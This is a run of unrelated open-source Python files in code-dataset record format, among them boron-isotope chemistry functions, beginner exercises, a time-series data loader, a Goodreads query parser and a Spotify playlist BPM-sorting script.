alphaB * chiB\n + chiB ** 2\n - 2 * chiB\n + 1\n )\n - 1\n ) / (2 * alphaB * chiB - 2 * alphaB - 2 * chiB + 2)\n\n# Calculate alpha using isotope fractional abundance of boric acid (B(OH)3)\ndef calculate_alpha_ABO3(H, Ks, ABT, ABO3):\n \"\"\"\n Calculate fractionation factor (alpha) from the fractional abundance of 11B in B(OH)3 (ABO3)\n\n Parameters\n ----------\n Ks : dict\n Dictionary of stoichiometric equilibrium constants.\n H : array-like\n The activity of Hydrogen ions in mol kg-1\n ABT : array-like\n The fractional abundance of 11B in total B.\n ABO3 : array-like\n The fractional abundance of 11B in boric acid (B(OH)3).\n\n Returns\n -------\n array-like\n The fractionation factor between B(OH)3 and B(OH)4- (alpha)\n \"\"\"\n return ( (1\n / ((H/Ks.KB) * (ABT - ABO3) + ABT)) \n / (ABO3 -1))\n\n# Calculate alpha using isotope fractional abundance of borate ion (B(OH)4)\ndef calculate_alpha_ABO4(H, Ks, ABT, ABO4):\n \"\"\"\n Calculate fractionation factor (alpha) from the fractional abundance of 11B in B(OH)3 (ABO3)\n\n Parameters\n ----------\n Ks : dict\n Dictionary of stoichiometric equilibrium constants.\n H : array-like\n The activity of Hydrogen ions in mol kg-1\n ABT : array-like\n The fractional abundance of 11B in total B.\n ABO4 : array-like\n The fractional abundance of 11B in borate ion (B(OH)4).\n\n Returns\n -------\n array-like\n The fractionation factor between B(OH)3 and B(OH)4- (alpha)\n \"\"\"\n return ( (1/ABO4 - 1)\n / (1 / (ABT - ((ABO4-ABT)/(H/Ks.KB))) -1) )\n\n# Calculate alpha using isotope fractional abundance of borate ion (B(OH)4)\ndef calculate_KB(H, alphaB, ABT, ABO4=None, ABO3=None):\n \"\"\"\n Calculate stoichiometric equilibrium constant for boron\n\n Parameters\n ----------\n H : array-like\n The activity of Hydrogen ions in mol kg-1\n alphaB : array-like\n The fractionation factor between B(OH)3 and B(OH)4-\n ABT : array-like\n The fractional abundance of 11B in total B.\n ABO4 : array-like\n The fractional abundance of 11B in borate ion (B(OH)4).\n ABO3 : array-like\n The fractional abundance of 11B in boric acid (B(OH)3).\n\n Returns\n -------\n array-like\n The stoichiometric equilibrium constant for boron (KB)\n \"\"\"\n ABO4 = ABO3_or_ABO4(ABO3,ABO4,alphaB)\n return (H\n / ((ABO4 - ABT)\n / ( ABT \n - 1 / ( (1/alphaB) * (1/ABO4 -1) + 1) )))\n\ndef calc_B_isotopes(pHtot=None, ABT=None, ABO3=None, ABO4=None, alphaB=None, Ks=None, **kwargs):\n # determine pH and ABT\n if pHtot is not None: # pH is known\n H = 10**-pHtot\n if ABT is None:\n ABT = calculate_ABT(H=H, Ks=Ks, alphaB=alphaB, ABO3=ABO3, ABO4=ABO4)\n else: # pH is not known\n if ABT is not None:\n H = calculate_H(Ks=Ks, alphaB=alphaB, ABT=ABT, ABO3=ABO3, ABO4=ABO4)\n pHtot = -np.log10(H)\n else:\n raise ValueError('ABT and one of ABO3 or ABO4 must be specified if pH is missing.')\n \n if ABO3 is None:\n ABO3 = calculate_ABO3(H=H, Ks=Ks, ABT=ABT, alphaB=alphaB)\n if ABO4 is None:\n ABO4 = calculate_ABO4(H=H, Ks=Ks, ABT=ABT, alphaB=alphaB)\n \n return Bunch({\n 'pHtot': pHtot,\n 'ABT': ABT,\n 'ABO4': ABO4,\n 'ABO3': ABO3,\n 'H': H\n })\n\n# Wrapper functions using delta values\ndef calculate_pH(Ks, d11BT, d11B4, epsilon=get_epsilonB()):\n \"\"\"\n Calculates pH on the total scale\n\n Parameters\n ----------\n Ks : Bunch (dictionary with . access)\n bunch containing the boron speciation constant KB\n d11BT : float or array-like\n isotope ratio 11B/10B in total boron - delta units\n d11B4 : float or array-like\n isotope ratio 11B/10B in BO4 - delta units, in ‰\n epsilon : float or array-like\n fractionation factor between BO3 and BO4, in ‰\n\n Returns\n ----------\n array-like\n pH on the total scale\n \"\"\"\n ABO4 = d11_to_A11(d11B4)\n ABT = d11_to_A11(d11BT)\n alphaB = epsilon_to_alpha(epsilon)\n\n return -np.log10(calculate_H(Ks,alphaB,ABT,ABO4))\n\ndef calculate_pKB(pH, d11BT, d11B4, epsilonB=get_epsilonB()):\n \"\"\"\n Calculate stoichiometric equilibrium constant for boron with delta inputs\n\n Parameters\n ----------\n pH : array-like\n pH on the total scale\n d11BT : array-like\n The isotope ratio of 11B in total B in delta units, in ‰\n d11B4 : array-like\n The isotope ratio of 11B in borate ion (B(OH)4) in delta units, in ‰\n epsilonB : array-like\n The fractionation factor between B(OH)3 and B(OH)4- as delta units, in ‰\n\n Returns\n -------\n array-like\n The stoichiometric equilibrium constant for boron (KB)\n \"\"\"\n ABO4 = d11_to_A11(d11B4)\n ABT = d11_to_A11(d11BT)\n H = 10**-pH\n\n alphaB = epsilon_to_alpha(epsilonB)\n\n return -np.log10(calculate_KB(H,alphaB,ABT,ABO4))\n\ndef calculate_d11BT(pH, KB, d11B4, epsilonB=get_epsilonB()):\n \"\"\"\n Calcluates the isotope ratio of total boron in delta units\n\n Parameters\n ----------\n pH : float or array-like\n pH on the total scale\n KB : Bunch (dictionary with . access)\n bunch containing the boron speciation constant KB\n d11B4 : float or array-like\n isotope ratio 11B/10B in BO4 - delta units, in ‰\n epsilonB : float or array-like\n fractionation factor between BO3 and BO4, units of ‰\n\n Returns\n -------\n array-like\n The isotope ratio 11B/10B in BT - delta units (d11BT), in ‰\n \"\"\"\n ABO4 = d11_to_A11(d11B4)\n alphaB = epsilon_to_alpha(epsilonB)\n H = 10**-pH\n return A11_to_d11(calculate_ABT(H,KB,alphaB,ABO4))\n\ndef calculate_d11B4(pH, KB, d11BT, epsilonB=get_epsilonB()):\n \"\"\"\n Calculates the isotope ratio of borate ion in delta units\n\n Parameters\n ----------\n pH : float or array-like\n pH on the total scale\n KB : Bunch (dictionary with . access)\n bunch containing the boron speciation constant KB\n d11BT : float or array-like\n isotope ratio 11B/10B in total boron - delta units, in ‰\n epsilonB : float or array-like\n fractionation factor between BO3 and BO4, units of ‰\n \n Returns\n -------\n array-like\n The isotope ratio 11B/10B in BO4 - delta units, in ‰\n \"\"\"\n ABOT = d11_to_A11(d11BT)\n alphaB = epsilon_to_alpha(epsilonB)\n\n return A11_to_d11(calculate_ABO4(10**-pH,KB,ABOT,alphaB))\n\ndef calculate_epsilon(pH, KB, d11BT, d11B4):\n \"\"\"\n Returns isotope ratio of borate ion in delta units\n\n Parameters\n ----------\n pH : float or array-like\n pH on the total scale\n KB : Bunch (dictionary with . access)\n bunch containing the boron speciation constant KB\n d11BT : float or array-like\n isotope ratio 11B/10B in total boron - delta units, in ‰\n d11B4 : float or array-like\n isotope ratio 11B/10B in borate ion (B(OH)4) - delta units, in ‰\n \n Returns\n -------\n array-like\n fractionation factor between BO3 and BO4 in delta units (epsilon, in ��)\n \"\"\"\n ABO4 = d11_to_A11(d11B4)\n ABT = d11_to_A11(d11BT)\n H = 10**-pH\n\n alphaB = calculate_alpha_ABO4(H,KB,ABT,ABO4)\n\n return alpha_to_epsilon(alphaB)\n","repo_name":"oscarbranson/cbsyst","sub_path":"cbsyst/boron_isotopes.py","file_name":"boron_isotopes.py","file_ext":"py","file_size_in_byte":16135,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"70447498346","text":"import math\n\n\nclass Circle:\n\n def __init__(self, x_coordinate=0, y_coordinate=0, radius=1):\n self.x_coordinate = x_coordinate\n self.y_coordinate = y_coordinate\n self.radius = radius\n\n def get_area(self):\n print('Площадь равна:', round((self.radius * self.radius * math.pi), 2))\n\n def get_perimeter(self):\n print('Периметр равен:', round((2 * self.radius * math.pi), 2))\n\n def scale(self, x_scale):\n self.radius *= x_scale\n print(f'Окружность увеличилась в {x_scale} раз:', self.radius)\n\n def is_intersect(self, other):\n intersection = (\n (self.x_coordinate - other.x_coordinate) ** 2 + (self.y_coordinate - other.y_coordinate) ** 2 <= (\n self.radius + other.radius) ** 2)\n if intersection:\n print('Окружности пересекаются')\n else:\n print('Окружности не пересекаются')\n\n\ncircle = Circle(-2, 8, 2)\ncircle2 = Circle(9, 20, 1)\ncircle.get_area()\ncircle.scale(5)\ncircle.get_perimeter()\ncircle.is_intersect(circle2)\n\n\n","repo_name":"vladislavten/my_work2","sub_path":"Module24/03_circle/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32441729067","text":"#Create a class and check if changing instance varibale changes class variable and create a static method to greet the programmer\nclass major:\n a=45\n @classmethod\n def prt(cls):\n print(cls.a)\n \n @staticmethod\n def greet():\n print(\"Good morning\")\n\nm=major()\nm.a=64\nm.prt()\nm.greet()\n","repo_name":"Souvik-223/Python-Learnings","sub_path":"Practise/Question45.py","file_name":"Question45.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"5197145542","text":"from random import shuffle\nimport numpy as np\nimport pandas as pd\n\n\nclass Field:\n def __init__(self):\n self.length = 0\n self.st = 0\n self.ed = 0\n self.values = None\n\n\nclass TimeSeriesDataset:\n def __init__(self, para, df):\n if not isinstance(para, dict):\n raise TypeError('para must be dict like type!')\n if not isinstance(df, pd.DataFrame):\n raise TypeError('df must be DataFrame!')\n if len(df) <= 0:\n raise ValueError('df is empty!')\n\n self.timesteps = len(df)\n self.para = para\n\n x = y = z = None\n\n if 'x' not in para.keys():\n raise ValueError('x is not exist')\n if 'y' not in para.keys():\n raise ValueError('y is not exist')\n\n x = Field()\n x.length = para['x']['range'][1] - para['x']['range'][0] + 1\n x.st = para['x']['range'][0] - para['z']['range'][0] \\\n if 'z' in para.keys() and para['x']['range'][0] <= para['z']['range'][0] else 0\n x.ed = self.timesteps - (para['y']['range'][1] - para['x']['range'][0])\n x.values = df[para['x']['key']].values\n x_examples = []\n for i in range(x.st, x.ed, para['step']):\n x_examples.append(np.expand_dims(x.values[i:i + x.length], axis=0))\n x.values = np.concatenate(x_examples, axis=0)\n\n y = Field()\n y.length = para['y']['range'][1] - para['y']['range'][0] + 1\n y.st = para['y']['range'][0] - para['z']['range'][0] \\\n if 'z' in para.keys() and para['x']['range'][0] <= para['z']['range'][0] \\\n else para['y']['range'][0] - para['x']['range'][0]\n y.ed = self.timesteps - (para['y']['range'][1] - para['y']['range'][0])\n y.values = df[para['y']['key']].values\n y_examples = []\n for i in range(y.st, y.ed):\n y_examples.append(np.expand_dims(y.values[i:i + y.length], axis=0))\n y.values = np.concatenate(y_examples, axis=0)\n\n if 'z' in para.keys():\n z = Field()\n z.length = para['z']['range'][1] - para['z']['range'][0] + 1\n z.st = 0 if para['z']['range'][0] <= para['x']['range'][0] \\\n else para['z']['range'][0] - para['x']['range'][0]\n z.ed = self.timesteps - (para['y']['range'][1] - para['z']['range'][0])\n z.values = df[para['z']['key']].values\n z_examples = []\n for i in range(z.st, z.ed):\n z_examples.append(np.expand_dims(z.values[i:i + z.length], axis=0))\n z.values = np.concatenate(z_examples, axis=0)\n\n zip_list = []\n\n for i in [x, y, z]:\n if i is None:\n continue\n zip_list.append(i.values)\n\n dataset = []\n for data in zip(*zip_list):\n dataset.append(list(data))\n\n data_size = len(dataset)\n split = [int(i * data_size) for i in self.para.split]\n self.dataset = []\n for i in range(3):\n self.dataset.append(dataset[split[i]:split[i + 1]])\n\n self.train_initalizer()\n self.validation_initializer()\n self.test_initalizer()\n\n def train_initalizer(self):\n train = self.dataset[0].copy()\n if self.para['shuffle']:\n shuffle(train)\n self.train_status = {'data': train, 'idx': 0, 'epoch': 0}\n\n def validation_initializer(self):\n validation = self.dataset[1].copy()\n self.validation_status = {'data': validation, 'idx': 0, 'stop': False}\n\n def test_initalizer(self):\n test = self.dataset[2].copy()\n self.test_status = {'data': test, 'idx': 0, 'stop': False}\n\n def get_train_batch(self):\n batch_size = self.para['batch_size']\n idx = self.train_status['idx']\n if idx + 2 * batch_size > len(self.train_status['data']) and idx + batch_size <= len(self.train_status['data']):\n self.train_status['epoch'] += 1\n if idx + batch_size > len(self.train_status['data']):\n idx = 0\n self.train_status['data'] = self.dataset[0].copy()\n if self.para['shuffle']:\n shuffle(self.train_status['data'])\n\n data = self.train_status['data'][idx:idx + batch_size]\n self.train_status['idx'] = idx + batch_size\n batch_data = []\n for n in zip(*data):\n batch_data.append(n)\n if len(batch_data) == 2:\n x = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[0]])\n y = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[1]])\n return x, y\n if len(batch_data) == 3:\n x = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[0]])\n y = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[1]])\n z = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[2]])\n return x, y, z\n else:\n raise ValueError('label and feature numbers is not support!')\n return\n\n def get_validation_batch(self):\n batch_size = self.para['batch_size']\n idx = self.validation_status['idx']\n if idx + 2 * batch_size > len(self.validation_status['data']):\n self.validation_status['stop'] = True\n data = self.validation_status['data'][idx:idx + batch_size]\n self.validation_status['idx'] = idx + batch_size\n batch_data = []\n for n in zip(*data):\n batch_data.append(n)\n if len(batch_data) == 2:\n x = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[0]])\n y = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[1]])\n return x, y\n if len(batch_data) == 3:\n x = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[0]])\n y = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[1]])\n z = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[2]])\n return x, y, z\n else:\n raise ValueError('label and feature numbers is not support!')\n\n\nclass electricity(TimeSeriesDataset):\n def __init__(self, para, df):\n self.df = df.copy()\n input_size = df.values.shape[1]\n dat = np.zeros(df.values.shape, np.float32)\n self.scale = np.zeros(input_size, np.float32)\n self.mn = np.zeros(input_size, np.float32)\n for i in range(input_size):\n self.mn[i] = np.min(df.values[:, i])\n self.scale[i] = np.max(df.values[:, i]) - self.mn[i]\n dat[:, i] = (df.values[:, i] - self.mn[i]) / self.scale[i]\n norm_df = pd.DataFrame(dat, columns=df.columns)\n\n super(electricity, self).__init__(para, norm_df)\n\n validation = self.validation_status['data'].copy()\n y = None\n for i, val in enumerate(zip(*validation)):\n if i != 1:\n continue\n y = np.concatenate(val, axis=0)\n self.validation_rse = np.std(y * self.scale + self.mn)","repo_name":"lxyai/tpa","sub_path":"utils/timeseries.py","file_name":"timeseries.py","file_ext":"py","file_size_in_byte":6991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28385599118","text":"# 0 1 1 2 3 5 8\n\nn1=0\nn2=1\na=int(input(\"Enter the limit:\"))\nprint(\"Fibonnacci\")\nfor i in range(a):\n print(n1)\n sum=n1+n2\n n1=n2\n n2=sum\n\n#using while\n\nprint(\"Using while\")\nnterms=10\nn1=0\nn2=1\ncount=0\nprint(\"fibonacci sequence\")\nwhile count < nterms:\n print(n1)\n nth=n1+n2\n n1=n2\n n2=nth\n count +=1\n","repo_name":"SabithaSubair/Luminar_PythonDjangoProjects_May","sub_path":"samplepgms/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38393407800","text":"# tips: 重新排序字串並作為的hashmap的key\n# O(n*klogk),若字串長度k很短,則可將klogk看作常數\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n group = {}\n \n for word in strs:\n sorted_word = ''.join(sorted(word))\n if sorted_word in group:\n group[sorted_word].append(word)\n else:\n group[sorted_word] = [word]\n \n return [x for x in group.values()]","repo_name":"hcygeorge/my-leetcode","sub_path":"array/medium/49. Group Anagrams.py","file_name":"49. Group Anagrams.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11546898608","text":"import xbmcgui # pylint: disable=import-error\nimport xbmcplugin # pylint: disable=import-error\n\nfrom ..constants import MODES\nfrom ..generators.category import category_generator\nfrom ..items.next_page import NextPage\nfrom ..lib.url_utils import create_addon_path\n\n\ndef invoke(context, page_token=''):\n payload = context.api.video_categories(page_token=page_token)\n items = list(category_generator(payload.get('items', [])))\n\n page_token = payload.get('nextPageToken')\n if page_token:\n directory = NextPage(\n label=context.i18n('Next Page'),\n path=create_addon_path({\n 'mode': str(MODES.CATEGORIES),\n 'page_token': page_token\n })\n )\n items.append(tuple(directory))\n\n if items:\n xbmcplugin.addDirectoryItems(context.handle, items, len(items))\n\n xbmcplugin.endOfDirectory(context.handle, True)\n\n else:\n xbmcgui.Dialog().notification(context.addon.getAddonInfo('name'),\n context.i18n('No entries found'),\n context.addon.getAddonInfo('icon'),\n sound=False)\n xbmcplugin.endOfDirectory(context.handle, False)\n","repo_name":"anxdpanic/plugin.video.tubed","sub_path":"resources/lib/src/routes/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"4850533656","text":"# Librería numpy\r\nimport numpy as np\r\nfrom time import*\r\n\r\ndef sumD(n,A,t,x):\r\n\ts = 0\r\n\tfor i in range(0,n):\r\n\t\ts=s+A[t][i]*x[i]\r\n\treturn s\r\ndef sumI(j,n,A,t,x):\r\n\ts = 0\r\n\tif j>=n :\r\n\t\treturn 0\r\n\tfor i in range(j,n):\r\n\t\ts=s+A[i][t]*x[i]\r\n\treturn s\r\n\r\ndef sum1(i,j,A):\r\n\ts = 0\r\n\tif i==0:\r\n\t\treturn 0\r\n\tfor k in range(0,i):\r\n\t\ts=s+A[j][k]*A[i][k]\r\n\treturn s\r\n\r\ndef pivoteT(n,i,A,b):\r\n\tif i>=0 and i1:\n #Crear recursividad\n Entero(numero-1)\n #Imprimir secuencia SEGUN EL ORDEN DE LIBERACION en la memoria\n print(numero)\n \n#Llamar a la funcion\nEntero(5)\n","repo_name":"chungomovil/python","sub_path":"retomar/90_2.py","file_name":"90_2.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40852439084","text":"import re\n\nAUTHOR_ATTRIBUTES = [\"_id\", \"author_url\", \"name\", \"review_count\", \"image_url\", \"rating\", \n \"rating_count\", \"author_books\", \"related_authors\"]\nNUMBER_ATTRIBUTES = [\"id\", \"review_count\", \"rating\", \"rating_count\"]\nBOOK_ATTRIBUTES = [\"id\", \"book_url\", \"rating\", \"rating_count\", \"author\", \"author_url\",\n \"title\", \"ISBN\", \"review_count\", \"image_url\", \"similar_books\"]\nATTRIBUTES = {\"author\": AUTHOR_ATTRIBUTES, \"book\": BOOK_ATTRIBUTES}\n\n\ndef parse_whole_argument(query, error):\n ''' function that deal with whole query containing logic operator\n\n Args:\n query: query to parse\n error: string to record error\n\n Return:\n (condition for the find() function in database, table). None for invalid query\n '''\n\n and_result = re.search(\"AND\", query)\n or_result = re.search(\"OR\", query)\n not_result = re.search(\"NOT\", query)\n if and_result:\n # if nothing before AND or nothing after AND, then invalid\n if and_result.span()[0] == 0 or and_result.span()[1] == len(query):\n error.append(\"invalid AND query\")\n else:\n return parse_and(query, error)\n \n elif or_result:\n # if nothing before OR or nothing after OR, then invalid\n if or_result.span()[0] == 0 or or_result.span()[1] == len(query):\n error.append(\"invalid OR query\")\n else:\n return parse_or(query, error)\n\n \n elif not_result:\n removed_not_query = query.replace(\"NOT\", \"\", 1)\n return parse_single_query(removed_not_query, True, error)\n else:\n return parse_single_query(query, False, error)\n \n return None\n\ndef parse_single_query(query, contain_not, error):\n ''' function that parse a single query, i.e. does not contain any logic operator\n \n Args:\n query: the query to parse\n contain_not: true if the original_query contain NOT \n (NOT is removed in parse_whole_argument())\n error: string to record error\n\n Return: (condition for the find() function in database, table). None for invalid query\n '''\n \n if check_logic_operator(query):\n error.append(\"invalid query. Nested/chained operator are not supported.\")\n return None\n \n dot_result = re.search(r\"\\.\", query)\n colon_result = re.search(r\"\\:\", query)\n\n # the query is invalid if no attribute is specified\n if dot_result is None or dot_result.span()[0] == 0 or dot_result.span()[1] == len(query):\n return None\n\n table = re.split(r\"\\.\", query)[0]\n if colon_result is None:\n # output all values for the attribute if query only contains \".\"\n attribute = re.split(r\"\\.\", query)[1]\n if table not in ATTRIBUTES or attribute not in ATTRIBUTES[table]:\n error.append(\"table or attribute does not exist\")\n return None\n return ({}, {\"_id\":0, attribute: 1}, table)\n else:\n # attribute is the string between \".\" and \":\"\n attribute = re.search(r\".\\.(.*?)\\:\", query).group(1)\n # if table is not book or author or attribute does not exist, invalid\n \n if table not in ATTRIBUTES or attribute not in ATTRIBUTES[table]:\n error.append(\"table or attribute does not exist\")\n return None\n \n # check for > or <\n greater_than_result = re.search(\">\", query)\n less_than_result = re.search(\"<\", query)\n quote_result = re.search(r\"\\\"\", query)\n\n if greater_than_result:\n value = is_query_valid(query, \">\", attribute, error)\n if value:\n if contain_not: \n return ({\"$expr\": {\"$not\": {\"$gt\": \n [{ \"$toDouble\": \"$\"+ attribute}, value]}}}, table)\n return ({\"$expr\": {\"$gt\": \n [{ \"$toDouble\": \"$\"+ attribute}, value]}}, table)\n \n elif less_than_result:\n value = is_query_valid(query, \"<\", attribute, error)\n if value:\n if contain_not:\n return ({\"$expr\": {\"$not\": {\"$lt\": \n [{ \"$toDouble\": \"$\"+ attribute}, value]}}}, table)\n return ({\"$expr\": {\"$lt\":\n [{ \"$toDouble\": \"$\"+ attribute}, value]}}, table)\n\n elif quote_result:\n # check there are only two quotes if quotes exist\n if len(re.findall(r\"\\\"\", query)) != 2:\n error.append(\"invalid number of quotes\")\n return None\n value = is_query_valid(query, \"\\\"\", attribute, error)\n if value:\n if contain_not:\n return ({attribute: {\"$ne\": value}}, table)\n return ({attribute: value}, table)\n\n return None\n\ndef parse_and(query, error):\n ''' function that deal with whole query containing AND\n\n Args:\n query: query to parse\n error: string to record error\n\n Return:\n (condition for the find() function in database, table). None for invalid query\n '''\n\n queries = query.split(\"AND\")\n first_query_result = parse_single_query(queries[0].strip(), False)\n second_query_result = parse_single_query(queries[1].strip(), False)\n\n if first_query_result and second_query_result:\n if first_query_result[-1] == second_query_result[-1]:\n return ({\"$and\": [first_query_result[0], second_query_result[0]]},\n first_query_result[-1])\n\n error.append(\"queries separated by AND are not on the same table\")\n return None\n\n\ndef parse_or(query, error):\n ''' function that deal with whole query containing OR\n\n Args:\n query: query to parse\n error: string to record error\n \n Return:\n (condition for the find() function in database, table). None for invalid query\n '''\n\n queries = query.split(\"OR\")\n first_query_result = parse_single_query(queries[0].strip(), False)\n second_query_result = parse_single_query(queries[1].strip(), False)\n\n if first_query_result and second_query_result:\n if first_query_result[-1] == second_query_result[-1]:\n return ({\"$or\": [first_query_result[0], second_query_result[0]]},\n first_query_result[-1])\n\n error.append(\"queries separated by OR are not on the same table\")\n return None\n\n\ndef check_logic_operator(query):\n ''' check if there is a logic operator in query\n\n Args:\n query: query to check\n \n Return:\n true if query contain logic operator. false otherwise\n '''\n \n and_result = re.search(\"AND\", query)\n or_result = re.search(\"OR\", query)\n not_result = re.search(\"NOT\", query)\n if and_result or or_result or not_result:\n return True\n return False\n\n\ndef is_query_valid(query, operator, attribute, error):\n ''' check if a query is valid\n\n Args:\n query: query to check\n operator: operator used in query\n attribute: attribute of query\n error: string to record error\n\n Return:\n True if query is valid\n '''\n\n if operator == \">\" or operator == \"<\":\n if attribute not in NUMBER_ATTRIBUTES:\n error.append(\"non numerical values are not comparable\")\n return None\n value = re.split(operator, query)[1].strip()\n if len(value) != 0:\n value_is_numerical = value.replace(\".\", \"\", 1).isdigit()\n if attribute in NUMBER_ATTRIBUTES and value_is_numerical:\n return float(value)\n else:\n error.append(\"specified value is not the corect type\")\n return None\n\n ","repo_name":"xinshuoLei/Goodreads-Scrapper","sub_path":"query_parser.py","file_name":"query_parser.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16507680942","text":"import time\nfrom math import ceil\nimport json\nimport os, traceback\nimport sys\nimport spotipy\nfrom dotenv import load_dotenv\nload_dotenv()\n\nCACHE_FILE = \"./bpm-checker.json\"\n\n# Calculates the bpm of a song (roughly) by \n# summing up the counts between a certain amount of taps. \ndef determine_bpm(requested_bpm_accuracy = 8):\n\n print(\"\\nTap {} times to the beat using enter key.\\\n \\nIf you made a mistake, type rs and then enter. \\\n \\nTo remove the song, press d and enter.\".format(\n requested_bpm_accuracy))\n\n i = total_time = 0\n while i is not requested_bpm_accuracy:\n user_input = input(\"Press enter on the beat: \")\n if i > 0:\n total_time += time.time() - start_time\n if user_input == \"rs\":\n print(\"Resetting count of this number, start again now.\")\n i = total_time = start_time = 0\n continue\n total_time += time.time() - start_time\n if user_input == \"d\":\n return {\"bpm\": 9999, \"status\": \"DELETE\"}\n start_time = time.time()\n i += 1\n\n total_time += time.time() - start_time\n bpm = ceil(60 * (requested_bpm_accuracy-1) / total_time)\n return {\"bpm\": bpm, \"status\": \"OK\"}\n\n# Function that's for getting a dictionary of all user playlists. \ndef get_user_playlists(sp):\n items = []\n finished = False\n offset = 0\n\n user_name = sp.current_user()['display_name']\n while not finished:\n\n # Get playlists that the user can modify.\n current_results = sp.current_user_playlists(\n limit=50, \n offset=offset)\n items += [\n { \"id\": playlist['id'], \n \"name\": playlist['name'], \n \"snapshot_id\": playlist['snapshot_id'] } \n for playlist in current_results['items']\n if (\n playlist['owner']['display_name'] == user_name \n or playlist['collaborative']) ]\n\n # Make sure we're looping until we've got everything.\n if (offset + 50) >= current_results['total']:\n finished = True\n else:\n offset += 50\n return items\n\n# Opens cache from local storage file.\ndef open_bpm_cache():\n if os.path.exists(CACHE_FILE):\n with open(CACHE_FILE, \"r\") as json_file:\n track_file = json.load(json_file)\n if not track_file: return {}\n return {\n track_id:track_file[track_id] \n for track_id in track_file \n if 'bpm' in track_file[track_id] }\n else:\n return {}\n\n# Function that let's the user choose a playlist from their playlists. \ndef select_playlist(sp):\n playlists = get_user_playlists(sp)\n\n print(\"\\nYour playlists: \")\n for index in range(len(playlists)):\n print(\"{index: <4} {name}\".format(\n index=index, \n name=playlists[index]['name']))\n\n is_selected = False\n while not is_selected:\n selected = int(input(\"\\nEnter playlist number number: \".strip()) or -1)\n if 0 <= selected < len(playlists): \n is_selected = input(\n \"You are sorting list '{}', type 'y' if you want to continue.\".format(\n playlists[selected]['name'])).lower() == \"y\"\n\n return playlists[selected]\n\n\n# Function that's for getting a dictionary of all user playlists. \ndef get_playlist_tracks(sp, playlist_id):\n tracks = []\n offset = 0\n track_position = 0\n while True:\n\n # Get user's playlists.\n results = sp.playlist_tracks(\n playlist_id=playlist_id, \n fields=\"total,items(track(id,uri,name,artists(name)))\", \n limit=50, \n offset=offset)\n\n for track in [item['track'] for item in results['items']]:\n track['track_position'] = track_position\n track['artists'] = [artist['name'] for artist in track['artists']]\n track_position += 1\n tracks.append(track)\n\n # Make sure we're looping until we've got everything.\n if (offset + 50) > results['total']:\n return tracks\n else:\n offset += 50\n \n\n# Selects the user device based on choice.\ndef select_user_device(sp):\n devices = sp.devices()['devices']\n\n print(\"Your devices: \")\n for index in range(len(devices)):\n print(\"{index: <3} {name}\".format(\n index=index, \n name=devices[index]['name']))\n\n while True:\n device_index = int(\n input(\"Select a device on which to play ({}): \"\n .format(devices[0]['name'])).strip() \n or 0)\n if 0 <= device_index < len(devices): return devices[device_index]['id']\n\n# Asks the user if automated music should be played.\ndef ask_automated_music():\n while True:\n answer = input(\"\\nAutoplay the analysed music? Y/n: \").lower()\n if answer == \"\": answer = \"y\"\n if answer in [\"y\", \"n\"]: break;\n return answer == \"y\"\n\n# Asks user for required operation per track.\nSKIP_TRACK = 0\nREPLACE_TRACK = 1\nAVERAGE_TRACK = 2\ndef ask_track_operation():\n print(\"\\nIf the bpm is already known, what do you want to do?\")\n print(\"{}) Use the known bpm and skip the song\".format(SKIP_TRACK))\n print(\"{}) Replace the previously noted bpm\".format(REPLACE_TRACK))\n print(\"{}) Average with the previously noted bpm\".format(AVERAGE_TRACK))\n while True:\n answer = int(input(\"Answer (0): \") or 0)\n if 0 <= answer <= 2: return answer\n\n# Uses spotipy's function to set the right order in a playlist.\ndef sort_playlist_based_on_tracks(sp, user_id, playlist, tracks = []):\n\n track_ids = [track['id'] for track in tracks]\n\n for offset in range(ceil(len(track_ids)/100)):\n sp.user_playlist_remove_all_occurrences_of_tracks(\n user=user_id, \n playlist_id=playlist['id'], \n tracks=track_ids[offset*100:offset*100+100], \n snapshot_id=playlist['snapshot_id'])\n \n for offset in range(ceil(len(track_ids)/100)):\n sp.user_playlist_add_tracks(\n user=user_id, \n playlist_id=playlist['id'], \n tracks=track_ids[offset*100:offset*100+100])\n\n # Sorting algorithm that would have worked if I had more time ...\n # for i in range(len(tracks)-1, -1, -1):\n # print(\"moving {name} from pos {old} to pos {new}.\".format(name=tracks[i]['name'], old=tracks[i]['track_position'], new=i))\n # sp.user_playlist_reorder_tracks(user_id, playlist['id'], snapshot_id=playlist['snapshot_id'], range_start=tracks[i]['track_position'], insert_before=i)\n # if i % 5 == 0:\n # print(\"Giving spotify a rest...\")\n # time.sleep(5)\n print(\"Sorting 100% done!\")\n\n\n# =========================== Non Function Code ============================ #\n\n# Setting up the Spotify-client using online authentication. We require a lot of credentials. 